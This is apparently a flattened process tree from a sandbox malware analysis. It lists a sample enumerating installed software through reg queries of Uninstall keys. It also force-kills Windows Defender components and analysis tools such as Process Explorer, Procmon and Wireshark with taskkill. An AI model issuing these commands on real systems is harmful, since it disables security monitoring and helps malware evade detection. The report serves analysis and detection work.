C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:323⤵PID:4636
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4568
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:4880
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:4132
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:4488
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2052
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:3504
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:4464
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3964
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:780
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:3484
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:4108
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:4840
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4804
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:4668
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:4784
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:204
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:4748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:4940
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3456
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:4904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:744
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5108
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:2844
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:2016
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4256
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:4656
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:3640
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:344
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:392
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:4484
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5104
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:3708
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:4628
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:643⤵PID:2184
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:323⤵PID:4444
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4440
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:643⤵PID:4836
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:323⤵PID:1684
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:4308
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4352
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:4116
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:2908
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:5072
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:4204
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:4464
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3152
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:3348
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:4684
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:4052
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:4700
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2224
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1456
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:4548
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:4128
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:4788
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:4416
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:4356
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2648